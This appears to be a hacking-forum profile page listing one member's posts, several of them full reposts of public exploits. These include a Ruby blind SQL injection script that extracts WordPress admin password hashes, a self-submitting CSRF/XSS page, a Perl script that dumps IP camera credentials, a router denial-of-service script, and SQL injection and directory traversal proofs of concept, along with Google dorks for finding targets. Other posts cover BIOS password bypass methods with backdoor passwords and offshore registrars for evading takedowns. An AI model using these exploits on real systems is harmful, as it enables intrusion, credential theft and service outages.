
Gonzalez
Active Members
Posts: 1576
Days Won: 9

Everything posted by Gonzalez

  1. Welcome to RST. -Gonzalez
  2. The forum isn't working properly for me, what do I do? ))) -Gonzalez
  3. # Exploit Title: ClipShare 4.1.1 - Multiple Vulnerabilities
    # Exploit Author: Esac
    # Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
    # Official site: http://www.clip-share.com
    # Software License: Commercial.
    # All versions are vulnerable.
    # Last Checked: 27 March 2013
    # Note: to exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).
    ==============================================================================================

    vuln file : gvideos.php , param : gid
    Poc : http://server/mavideo/gvideos.php?gid=1 [Blind]
    # To exploit this PoC, a group with some public videos must have been added previously.
    Real exploitation :
    http://server/mavideo/gvideos.php?gid=1 AND 1=1 ==> returns normal page
    http://server/mavideo/gvideos.php?gid=1 AND 1=2 ==> returns page with some errors (or with nothing - white page)
    --------------------------------------------------------------------------------
    vuln file : channel_detail.php , param : chid
    Poc : http://server/mavideo/channel_detail.php?chid=4 [Blind]
    Real exploitation :
    http://server/mavideo/channel_detail.php?chid=4 AND 1=1 ==> returns normal page
    http://server/mavideo/channel_detail.php?chid=4 AND 1=2 ==> returns page with some errors (or with nothing - white page)
    --------------------------------------------------------------------------------
    vuln file : uprofile.php , param : UID
    Poc : http://server/mavideo/uprofile.php?UID=66 [Blind]
    Real exploitation :
    http://server/mavideo/uprofile.php?UID=66 AND 1=1 ==> returns normal page
    http://server/mavideo/uprofile.php?UID=66 AND 1=2 ==> returns page with some errors (or with nothing - white page)
    --------------------------------------------------------------------------------
    vuln file : ufavour.php , param : UID
    Poc : http://server/mavideo/ufavour.php?UID=66 [Blind]
    Real exploitation :
    http://server/mavideo/ufavour.php?UID=66 AND 1=1 ==> returns normal page
    http://server/mavideo/ufavour.php?UID=66 AND 1=2 ==> returns page with some errors (or with nothing - white page)
    --------------------------------------------------------------------------------
    vuln file : ufriends.php , param : UID
    Poc : http://server/mavideo/ufriends.php?UID=66 [Blind]
    Real exploitation :
    http://server/mavideo/ufriends.php?UID=66 AND 1=1 ==> returns normal page
    http://server/mavideo/ufriends.php?UID=66 AND 1=2 ==> returns page with some errors (or with nothing - white page)
    --------------------------------------------------------------------------------
    vuln file : uplaylist.php , param : UID
    Poc : http://server/mavideo/uplaylist.php?UID=66 [Blind]
    Real exploitation :
    http://server/mavideo/uplaylist.php?UID=66 AND 1=1 ==> returns normal page
    http://server/mavideo/uplaylist.php?UID=66 AND 1=2 ==> returns page with some errors (or with nothing - white page)
    --------------------------------------------------------------------------------
    vuln file : ugroups.php , param : UID
    Poc : http://server/mavideo/ugroups.php?UID=66 [Blind]
    Real exploitation :
    http://server/mavideo/ugroups.php?UID=66 AND 1=1 ==> returns normal page
    http://server/mavideo/ugroups.php?UID=66 AND 1=2 ==> returns page with some errors (or with nothing - white page)
    --------------------------------------------------------------------------------

    PwnEd. Tested version: Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout Copyright © 2006-2008 ClipShare. All rights reserved.

    ~ Game Over ~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Greetz : White Tarbouch Team & Cobra & Dami ==> Made In Morocco <== ./Esac

    Source: Exploit-DB
  4. Nice article. The Romanian client wants you to do it for free, or even to pay him while you do the project. -Gonzalez
  5. Welcome! But what's with your language? -Gonzalez
  6. Welcome to RST. -Gonzalez
  7. Good for him, I think it's very nice to be a millionaire at his age. -Gonzalez
  8. Is it only like this for me? In my opinion it should be in the middle. Anyway, you did a top-notch job with the blog and the homepage. Well done and congratulations. -Gonzalez
  9. Congratulations. -Gonzalez
  10. Gonzalez

    Hi

    The guys are right, you're better off learning programming or something else you like; in programming the salary is good. Better leave the hacking to someone else. At least that's what I'd do if I were just starting out. -Gonzalez
  11. Hookers, cars and coke. -Gonzalez
  12. # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
    # Google Dork: inurl:wp-content/plugins/faqs-manager
    # Date: 21.03.2013
    # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
    # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
    # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
    # Version: 1.0
    # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
    ##############
    # Description:
    ##############
    # The "order" and "orderby" parameters are vulnerable to SQL Injection
    # Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=inic_faq&orderby=<sqli>
    # The PoC takes some time to finish (15min on my test system).
    # I could speed it up with multithreading but I'm too lazy right now
    ################################################################
    #### Vulnerable code part (wp_list_table.php) ####
    ################################################################
    #
    # function prepare_items() {
    #     $this->_column_headers = array($this->_columns, $this->_hidden_columns, $this->_sortable_columns);
    #     $sort_order = isset($_GET['order']) ? $_GET['order'] : "ASC";
    #     $orderby_column = isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby']} {$sort_order}" : false;
    #
    #     global $wpdb;
    #     if (is_array($this->_sql)) {
    #         if ($orderby_column == false) {
    #             $data = $this->_sql;
    #         } else {
    #             $data = $this->_sql;
    #             usort($data, array(&$this, 'usort_reorder'));
    #         }
    #     } else {
    #         $data = $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A);
    #     }
    ################################################################

    #################################
    #### Blind SQL Injection PoC ####
    #################################
    require "net/http"
    require "uri"

    $target = "" # EDIT ME #
    $cookie = "" # EDIT ME # authenticated user session

    # Example:
    #$target = "http://127.0.0.1:9001/wordpress/"
    #$cookie = "wordpress_a6a5d84619ae3f833460b386c064b9e5=admin%7C1364040545%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=tony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=tony%40bauer.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=http%3A%2F%2Fsucker.de; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_a6a5d84619ae3f833460b386c064b9e5=admin%7C1364040545%7Cd7053b96adaa95745023b91694bf30ef; PHPSESSID=1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=1"

    if $target.eql?("") or $cookie.eql?("")
      puts "\n[!]\tPlease set $target and $cookie variable\n"
      raise
    end

    $chars = ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
    $hash = "$P$"
    $i = 0 # chars index
    $j = 4 # hash index

    def sqli_send()
      sqli = URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$j}, 1)) FROM wp_users WHERE id = 1) = #{$chars[$i].ord}) THEN 1 ELSE 1*(SELECT table_name FROM information_schema.tables)END) --")
      uri = URI.parse("#{$target}wp-admin/admin.php?page=inic_faq&orderby=#{sqli}")
      http = Net::HTTP.new(uri.host, uri.port)
      #http.set_debug_output($stderr)
      request = Net::HTTP::Get.new(uri.request_uri)
      request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0"
      request["Cookie"] = $cookie
      resp = http.request(request)
      if( resp.code != "200" )
        puts "something is wrong response = #{resp.code}"
        raise
      end
      # In WordPress default settings there will be no SQL error displayed
      # but when an error appears we don't get any result.
      # The PoC searches for "No record found" and assumes there was an error
      return resp.body().match(/No record found/)
    end

    def print_status()
      output = "HASH: #{$hash} try #{$chars[$i]}"
      print "\b"*output.length + output
    end

    while( $hash.length < 34 )
      if( !sqli_send() )
        $hash += $chars[$i]
        $j += 1
        $i = 0
      else
        $i += 1
      end
      print_status()
    end

    puts "\n[+]\thave a nice day \n"
  13. <html>
    <!--
    # Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
    # Google Dork: inurl:wp-content/plugins/faqs-manager
    # Date: 21.03.2013
    # Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
    # Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
    # Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
    # Version: 1.0
    # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
    ##############
    # Description:
    ##############
    # The IndiaNIC FAQ Settings Page is vulnerable to CSRF.
    # The Ask Question area (front-end) is vulnerable to XSS. It is possible to insert <script>alert(1)</script> in the question parameter.
    # The Captcha value can be read from the captcha parameter (hidden field)
    #
    ###################################
    #### Part of Ask Question form ####
    ###################################
    <form action="" method="POST" name="iNICfaqsAskForm_1">
    <input type="hidden" value="1" name="group_id">
    <input type="hidden" value="1" name="from_user">
    <input type="hidden" value="inic_faq_questions" name="action">
    <input type="hidden" value="5540" name="captcha">   <=================== We don't need the captcha image when we have this xD

    ####################################################################
    #### Request from Ask Question area (XSS in question parameter) ####
    ####################################################################
    POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: 127.0.0.1:9001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://127.0.0.1:9001/wordpress/?p=11
    Content-Length: 143
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560

    # When the admin navigates to the Question area (back-end), arbitrary JavaScript will execute.
    #######################################################################
    -->
    <title>
    #####################################################
    ############## IndiaNIC FAQ 1.0 CSRF ################
    #####################################################
    </title>
    <body>
    <!-- replace "127.0.0.1:9001/wordpress" -->
    <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="inic_faq_settings" />
    <input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
    <input type="hidden" name="capture_email" value="1" />
    <input type="hidden" name="notify_when_answered" value="1" />
    <input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
    <input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
    <input type="hidden" name="custom_js" value="alert(1234)" />
    </form>
    <script>document.forms[0].submit();</script>
    </body>
    </html>
  14. #!/usr/bin/perl
    #
    # [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
    # Author: Todor Donev
    # Email: todor.donev at gmail dot com
    # Type: Hardware
    #
    # Thanks to Tsvetelina Emirska the best friend in my life
    # and all my other friends for the help and support which
    # gives me. Kind regards to all of you, who read my lil'
    # exploits.
    # Bulgaria, Sofia
    # 03.2013
    #
    # Shodanhq r0x 4 teh lulz!!
    # http://www.youtube.com/watch?v=qNyN1AY-YZQ Cheeerzz
    #
    # Another bug, hint: you can edit this code and add some lines to remotely change the password.
    #####
    use LWP::Simple;

    if (@ARGV == 0) { &usg; }

    while (@ARGV > 0) {
        $type = shift(@ARGV);
        $t = shift(@ARGV);
    }

    if ($type eq "-d") {
        my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulnerable, $!\n");
        print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n";
        print " [!] Exploiting: $t\n";
        if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
            $result .= " [o] User: $1\n";
        } else {
            die(" Try another exploit, $!");
        }
        if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g) {
            $result .= " [o] Password: $1\n";
        } else {
            die("Try another exploit or restart the exploit\n");
        }
        sleep(1);
        print " [\\m/] BINGO!!!\n\a" . $result;
    }

    sub usg() {
        print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
        print " [!] -d: disclosure password option\n";
        print " [!] exp: perl $0 -d 127.0.0.1 \n";
        exit;
    }
  15. [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
    ===============================================================================
    Author: Janek Vind "waraxe"
    Date: 19. March 2013
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/advisory-98.html

    Description of vulnerable software:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    OpenCart is a turn-key ready "out of the box" shopping cart solution. You simply install, select your template, add products and you're ready to start accepting orders.
    http://www.opencart.com/

    Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

    ###############################################################################
    1. Directory Traversal Vulnerabilities in "filemanager.php"
    ###############################################################################

    Reason: insufficient sanitization of user-supplied data
    Attack vectors: 1. user-supplied POST parameters "directory", "name", "path", "from", "to"
    Preconditions: 1. Logged in as admin with filemanager access privileges

    Script "filemanager.php" offers OpenCart admins various file related services: directory listing and creation, image file listing, file copy/move/unlink, upload, image resize. By design, an OpenCart admin can manage files and directories only inside the specific subdirectory "image/data/". It means that even if you have OpenCart admin privileges, you are still not supposed to get access to the files and directories below "image/data/". So far, so good. But what about directory traversal? Let's have a look at the source code.

    PHP script "admin/controller/common/filemanager.php" line 66:
    ------------------------[ source code start ]----------------------------------
    public function directory() {
        $json = array();

        if (isset($this->request->post['directory'])) {
            $directories = glob(rtrim(DIR_IMAGE . 'data/' . str_replace('../', '', $this->request->post['directory']), '/') . '/*', GLOB_ONLYDIR);

            if ($directories) {
                $i = 0;

                foreach ($directories as $directory) {
                    $json[$i]['data'] = basename($directory);
                    $json[$i]['attributes']['directory'] = utf8_substr($directory, strlen(DIR_IMAGE . 'data/'));
    ...
        $this->response->setOutput(json_encode($json));
    ------------------------[ source code end ]------------------------------------

    We can see that directory traversal is prevented by removing "../" substrings from user submitted parameters. At first look this seems to be secure enough - if we can't use "../", then directory traversal is impossible, right? Deeper analysis shows a couple of shortcomings in this specific filtering method.

    First problem - if OpenCart is hosted on a Windows platform, then it's possible to use the "..\" substring for directory traversal.

    Test (parameter "token" must be valid):
    -------------------------[ test code start ]-----------------------------------
    <html><body><center>
    <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
    <input type="hidden" name="directory" value="..\..\..\">
    <input type="submit" value="Test">
    </form>
    </center></body></html>
    --------------------------[ test code end ]------------------------------------

    Server response is in JSON format and contains a listing of subdirectories outside of the OpenCart main directory.

    Second problem - filtering with "str_replace" can be tricked by using custom strings. If we use the "..././" substring, then after filtering it becomes "../". So it appears that the implemented anti-traversal code is ineffective and can be bypassed.

    Test (parameter "token" must be valid):
    -------------------------[ test code start ]-----------------------------------
    <html><body><center>
    <form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
    <input type="hidden" name="directory" value="..././..././..././..././">
    <input type="submit" value="Test">
    </form>
    </center></body></html>
    --------------------------[ test code end ]------------------------------------

    Server response is exactly the same as in the previous test - information about the directory structure outside of the OpenCart main directory has been disclosed.

    PHP script "filemanager.php" contains 14 uses of the "str_replace('../', ''," code. Most of the public functions in "filemanager.php" are affected by the directory traversal vulnerability:

    public function directory() -> listing of subdirectories
    public function files() -> listing of image files
    public function create() -> creation of new directories
    public function delete() -> deletion of arbitrary files and directories
    public function move() -> renaming of files or directories
    public function copy() -> copying of files or directories
    public function rename() -> renaming of files or directories
    public function upload() -> uploading of image or flash files

    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    come2waraxe@yahoo.com
    Janek Vind "waraxe"

    Waraxe forum: http://www.waraxe.us/forums.html
    Personal homepage: http://www.janekvind.com/
    Random project: http://albumnow.com/
    ---------------------------------- [ EOF ] ------------------------------------
  16. Sorry I forgot to write headers in the previous mail.

    # Exploit Title: [possible ways to exploit CVE-2012-1663( GNUTLS-3.0.13)]
    # Google Dork: [if relevant] (we will automatically add these to the GHDB)
    # Date: [Mar 20, 2013]
    # Exploit Author: [Shawn the R0ck]
    # Vendor Homepage: [http://www.gnutls.org/]
    # Software Link: [download link if available]
    # Version: [<= 3.0.13]
    # Tested on: [GNU/Linux]
    # CVE : [CVE-2012-1663]

    PoC: http://www.exploit-db.com/sploits/24865.tar.bz2

    I'm glad to share this with you guys. The test code is attached. You can also find it here:
    https://github.com/citypw/arsenal-4-sec-testing/tree/master/libgnutls/CVE-2012-1663

    CVE-2013-1663[1] is a possible remote DoS attack issue. This issue has been fixed[2] in >= GNUTLS-3.0.14. I hacked on it for hours and figured out a few prerequisites that could make it vulnerable:

    =============================
    REQUIRED:
    - prior to GNUTLS 3.0.14
    - crafted certificate
    =============================

    Attacking SCENES
    - a client imports a crafted cert file for sending req to server( CA?)
    - a "server" imports a crafted cert file for sending req to other server( CA?)
    ---> With high frequency uses above manipulations

    Standing on the client side, the attacker should try to construct a crafted certificate for triggering a failure of the function below:

    ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
    if (ret < 0) {
        gnutls_pubkey_deinit(pcert->pubkey);
        /* pcert->pubkey should be NULL now */
        ret = gnutls_assert_val(ret);
        goto cleanup;
    }

    I made up two crafted cert files( client.pem, client2.pem) that seem to trigger the double free issue on the client's side.

    Warning: Don't try it on your host machine because it would cost too much memory and make your machine very slow.

    shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
    processing
    server set to null?
    Server ready. Listening to port '5556'.

    shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
    ................
    .................
    ...................

    Another terminal:
    killall client

    Test platform: Slackware 13.37 + GNUTLS-3.0.13

    [1] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1663
    [2] Upstream fix http://git.savannah.gnu.org/gitweb/?p=gnutls.git;a=commitdiff;h=9c62f4feb2bdd6fbbb06eb0c60bfdea80d21bbb8

    --
    GNU powered it...
    GPL protect it...
    God blessing it...

    regards
    Shawn
  17. #!/usr/local/bin/perl
    #
    #
    # TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit
    #
    #
    # Vendor: TP-LINK Technologies Co., Ltd.
    # Product web page: http://www.tp-link.us
    #
    # Affected version:
    #
    # - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
    # - Hardware version: WR740N v4 00000000 (v4.23)
    # - Model No. TL-WR740N / TL-WR740ND
    #
    # Summary: The TL-WR740N is a combined wired/wireless network connection
    # device integrated with internet-sharing router and 4-port switch. The
    # wireless N Router is 802.11b&g compatible based on 802.11n technology
    # and gives you 802.11n performance up to 150Mbps at an even more affordable
    # price. Bordering on 11n and surpassing 11g speed enables high bandwidth
    # consuming applications like video streaming to be more fluid.
    #
    # Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
    # remote denial of service vulnerability when processing an HTTP request. This
    # issue occurs when the web server (httpd) fails to handle an HTTP GET request
    # over the default TCP port 80. Sending a sequence of three dots (...) to
    # the router will crash its httpd service, denying legitimate users access
    # to the admin control panel management interface. To bring back the http srv
    # and the admin UI, a user must physically reboot the router.
    #
    #
    # ============================== Playground: ==============================
    #
    # Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
    #
    #
    # nmap -sV 192.168.0.1
    #
    # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time
    # Nmap scan report for 192.168.0.1
    # Host is up (0.00s latency).
    # Not shown: 999 closed ports
    # PORT   STATE SERVICE VERSION
    # 80/tcp open  http    TP-LINK WR740N WAP http config
    # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
    # Service Info: Device: WAP
    #
    # Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    # Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds
    #
    # --------------------------------------------------------------------------
    # Changed Probe Directive in nmap-service-probes file [4 d range]:
    # - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n|
    # + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0\r\n\r\n|
    # --------------------------------------------------------------------------
    #
    #
    # nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a"
    #
    # Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time
    # SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61 seq=1961954057 win=1480
    # RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40 seq=0 win=0
    #
    # Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms
    # Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%)
    # Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00
    # Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96
    # Nping done: 1 IP address pinged in 1.12 seconds
    #
    # --------------------------------------------------------------------------
    #
    #
    # nmap -Pn 192.168.0.1 -p80
    #
    # Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time
    # Nmap scan report for 192.168.0.1
    # Host is up (0.00s latency).
    # PORT   STATE  SERVICE
    # 80/tcp closed http
    # MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
    #
    # Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
    #
    # ============================= !Playground ===============================
    #
    #
    # Tested on: Router Webserver
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    #
    # Copyleft (c) 2013, Zero Science Lab
    # Macedonian Information Security Research And Development Laboratory
    # http://www.zeroscience.mk
    #
    #
    # Advisory ID: ZSL-2013-5135
    # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
    #
    #
    # 17.03.2013
    #

    use IO::Socket;

    $ip="$ARGV[0]";
    $port="$ARGV[1]";

    print "\n\n\x20"."\x1f"x42 ."\n";
    print "\x20\x1f"."\x20"x40 ."\x1f\n";
    print "\x20\x1f TP-Link TL-WR740N httpd DoS Exploit \x1f\n";
    print "\x20\x1f"."\x20"x40 ."\x1f\n";
    print "\x20\x1f"."\x20"x7 ."\x16"x5 ."\x20"x15 ."\x16"x5 ."\x20"x8 ."\x1f\n";
    print "\x20\x1f"."\x20"x9 ."\x16"."\x20"x19 ."\x16"."\x20"x10 ."\x1f\n";
    print "\x20" ."\x1f"x42 ."\n";
    print "\x20\x4" ."\x20"x40 ."\x4\n";
    print "\x20" ."\x1e" x 42 ."\n";

    if($#ARGV<1) {
        print "\n\n\x20\x20\x1a\x20Usage: $0 <ip> <port>\n\n";
        exit();
    }

    $socket=IO::Socket::INET->new( Proto => "tcp", PeerAddr => $ip, PeerPort => $port );

    $ta4ke="\x47\x45\x54\x20".
           "\x2f\x2e\x2e\x2e".
           "\x20\x48\x54\x54".
           "\x50\x2f\x31\x2e".
           "\x31\x0d\x0a\x0d".
           "\x0a";

    print "\n\x20\x1a\x20Sending evil payload...\n";
    sleep 2;
    print $socket "$ta4ke";
    sleep 5;
    close $socket;
    print "\x20\x1a\x20HTTPd successfully poked.\n";
    sleep 2;
    print "\x20\x1a\x20Verifying with Nmap...\n";
    sleep 2;
    system("nmap -Pn $ip -p $port");
    print "\n\x20\x1a\x20Playing goa-psy...\n";
    sleep 2;
    system("start C:\\Progra~1\\Winamp\\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008");
    sleep 1;
    print "\x20\x1a\x20All Done!\n";
    sleep 1;

    # Codename: Threetwoees
  18. This post contains a list of domain registrars that are offshore. By 'offshore' I mean they won't share your data with 3rd parties like US companies and won't suspend a domain based on DMCA.

    Here we go:
    http://prq.se/ - Offers anonymous domain registration (based in Sweden)
    http://www.binero.se/ - PirateBay.se domain registrar
    http://netart-registrar.com/ - torrentz.eu domain registrar
    http://www.webnames.ru - Good registrar for .su and .ws

    Remember: if you choose a .com, .net or .org you will still be subject to US law. This means a court order to Verisign and you lose your domain.

    Some offshore domain TLDs: .ws, .su
  19. Gonzalez

    Case

    Looks nice, well done. I like it. -Gonzalez
  20. Eminem - Stan (Long Version) ft. Dido -Gonzalez
  21. http://www.askvg.com/how-to-reset-remove-bypass-a-bios-or-cmos-password/

    BIOS passwords are used to add some extra security to computers. You can either set a password to prevent access to BIOS settings or to prevent the PC from booting. But sometimes this extra security might become a pain when you forget the BIOS password or someone changes your system BIOS password intentionally. But there is no need to worry. There are many known ways to reset / remove / bypass the password:

    - By removing the CMOS battery
    - By using the motherboard jumper
    - By using an MS DOS command
    - By using software
    - By using a backdoor BIOS password

    Now I'll try to explain each method one by one:

    DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or computer thieves. Please do not try any of the following procedures if you are not familiar with computer hardware. We'll not be responsible for the use or misuse of this information, including personal injury, loss of data or hardware damage. So use it at your own risk.

    By Removing CMOS Battery:
    Almost all motherboards use a small coin sized CMOS battery to store all BIOS settings along with the password. To reset the password, unplug the PC, open the cabinet and remove the CMOS battery for approx. 15-30 minutes and then put it back. It'll reset all BIOS settings as well as the password and you'll need to re-enter all settings. If it fails, then try to remove the battery for at least one hour.

    By Using Motherboard Jumper:
    Almost all motherboards contain a jumper that can clear all CMOS settings along with the BIOS password. The location of this jumper varies depending upon the motherboard brand. You should read your motherboard manual to check its location. If you don't have the manual then look for the jumpers near the CMOS battery. Most manufacturers label the jumper as CLR, CLEAR, CLEAR CMOS, etc. When you find the jumper, look carefully. There will be 3 pins and the jumper will be joining the center pin to either the left or right pin. What you need to do is remove the jumper and join the center pin to the opposite pin, e.g. if the jumper joins the center pin to the left pin, then remove it and join the center pin to the right pin. Now wait for a few seconds and then again remove the jumper and join the center pin to the left pin. Make sure to turn the PC off before opening the cabinet and resetting the jumper.

    By Using MS DOS Command:
    This method works only if you have access to the system when it's turned on, because this method requires MS DOS. Open Command Prompt from the Programs menu and provide the following commands one by one:

    debug
    o 70 2E
    o 71 FF
    quit

    NOTE: The first character in the above commands is the English letter "o" and not the number 0.

    After providing the above commands, restart your system and it should reset the CMOS settings along with the BIOS password. If you are curious to know how it works, then let me explain the above commands: in this method we are using the Debug tool of MS DOS. The "o" character at the start of these commands outputs the values to IO ports. The numbers 70 and 71 are port numbers which are used to access CMOS memory. By providing the FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as the BIOS password.

    By Using Software:
    There are a few software tools which can also reset CMOS settings or the BIOS password or both within a few clicks. But as stated above you should have access to a system which is turned on and should have access to MS DOS or MS Windows:

    - CmosPwd
    - KillCMOS

    By Using Backdoor BIOS Password:
    Some BIOS manufacturers put a backdoor password in the BIOS which always works irrespective of what password you have set in the BIOS. It's a master password which is used for testing and troubleshooting purposes.

    AMI BIOS Passwords:
    A.M.I. AAAMMMIII AMI?SW AMI_SW AMI BIOS CONDO HEWITT RAND LKWPETER MI Oder PASSWORD

    AWARD BIOS Passwords:
    01322222 589589 589721 595595 598598 ALFAROME ALLy aLLy aLLY ALLY aPAf _award award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC

    PHOENIX BIOS Passwords:
    BIOS CMOS phoenix PHOENIX

    Misc Common Passwords:
    ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

    Other Manufacturer BIOS Passwords:
    Biostar - Biostar
    Compaq - Compaq
    Dell - Dell
    Enox - xo11nE
    Epox - central
    Freetech - Posterie
    IWill - iwill
    Jetway - spooml
    Packard Bell - bell9
    QDI - QDI
    Siemens - SKY_FOX
    TMC - BIGO
    Toshiba - Toshiba
    VOBIS & IBM - merlin

    NOTE: All these passwords are case-sensitive and are changed from time to time by manufacturers.
  22. Good thing it's the Americans' PCs that are infected, where the big money is. -Gonzalez